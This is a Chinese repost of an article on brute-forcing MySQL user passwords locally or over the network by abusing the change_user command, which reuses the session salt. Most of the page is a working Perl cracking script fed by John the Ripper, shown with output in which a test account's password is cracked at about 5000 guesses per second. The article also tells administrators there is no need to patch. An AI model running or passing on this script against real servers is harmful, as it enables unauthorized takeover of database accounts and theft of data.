快速高效的破解MySQL本地和远程密码_SQL Server_数据库_程序员俱乐部

中国优秀的程序员网站程序员频道CXYCLUB技术地图
热搜:
更多>>
 
您所在的位置: 程序员俱乐部 > 数据库 > SQL Server > 快速高效的破解MySQL本地和远程密码

快速高效的破解MySQL本地和远程密码

 2016/5/12 5:34:42    程序员俱乐部  我要评论(0)
  • 摘要:快速的MySQL本地和远程密码破解!首先需要对数据库维护人员说明的是,不必紧张,你无需修补这个问题,看起来其实是个小错误而已。我找到一个方法可非常高效的破解MySQL的用户密码,包括本地用户和通过网络方式访问的用户密码。在我的测试中,通过网络方式的方法可每秒钟测试5000个密码。方法如下:攻击者使用一个无特权帐号登录到MySQL服务器,mysql有一个名为change_user的命令,该命令可用于在mysql会话中修改用户时的名字建议。因为这个命令执行非常快
  • 标签:破解 SQL MySQL 远程

快速的 MySQL 本地和远程密码破解!首先需要对数据库维护人员说明的是,不必紧张,你无需修补这个问题,看起来其实是个小错误而已。

我找到一个方法可非常高效的破解 MySQL 的用户密码,包括本地用户和通过网络方式访问的用户密码。在我的测试中,通过网络方式的方法可每秒钟测试 5000 个密码。

方法如下:

攻击者使用一个无特权帐号登录到 MySQL 服务器,mysql 有一个名为 change_user 的命令,该命令可用于在 mysql 会话中修改用户时的名字建议。因为这个命令执行非常快,因此可以很快速的用来破解 mysql 密码,而不是每次都重新连接到 mysql 服务器。

是什么导致非常慢?

因为使用 change_user 命令不会更改 SALT(这是一个弱点),而常规破解密码的方法每次连接时服务器都发送不同的 SALT。

下面是一个 Perl 脚本使用了 John the Ripper 的方法来生成密码:

测试的用户是 crackme 密码为 pass,只需数秒就可破解。

(大约 20 秒钟可测试 10 万密码)

测试脚本如下:

    class="dp-xml">
  1. use Net::MySQL; 
  2.  
  3. $|=1; 
  4.  
  5. my $mysql = Net::MySQL->new( 
  6. hostname => ’192.168.2.3′, 
  7. database => ‘test’, 
  8. user     => “user”, 
  9. password => “secret”, 
  10. debug => 0, 
  11. ); 
  12.  
  13. $crackuser = “crackme”; 
  14.  
  15. while(<stdin>) { 
  16. chomp; 
  17. $currentpass = $_; 
  18.  
  19. $vv = join “”, 
  20.         $crackuser, 
  21.         “\x14″. 
  22.         Net::MySQL::Password->scramble( 
  23.             $currentpass, $mysql->{salt}, $mysql->{client_capabilities} 
  24.         ) . “”; 
  25. if ($mysql->_execute_command(“\x11″, $vv) ne undef) { 
  26.     print “[*] Cracked! –> $currentpass\n”; 
  27.     exit; 

下面是我这台机器上的执行结果:

  1. C:\Users\kingcope\Desktop>C:\Users\kingcope\Desktop\john179\run\jo 
  2.  
  3. hn –incremental –stdout=5 | perl mysqlcrack.pl 
  4. Warning: MaxLen = 8 is too large for the current hash type, reduced to 5 
  5. words: 16382  time: 0:00:00:02  w/s: 6262  current: citcH 
  6. words: 24573  time: 0:00:00:04  w/s: 4916  current: rap 
  7. words: 40956  time: 0:00:00:07  w/s: 5498  current: matc3 
  8. words: 49147  time: 0:00:00:09  w/s: 5030  current: 4429 
  9. words: 65530  time: 0:00:00:12  w/s: 5354  current: ch141 
  10. words: 73721  time: 0:00:00:14  w/s: 5021  current: v3n 
  11. words: 90104  time: 0:00:00:17  w/s: 5277  current: pun2 
  12. [*] Cracked! –> pass 
  13. words: 98295  time: 0:00:00:18  w/s: 5434  current: 43gs 
  14.  
  15. Session aborted 

原文链接:http://www.kankanews.com/ICkengine/archives/212.shtml

发表评论
用户名: 匿名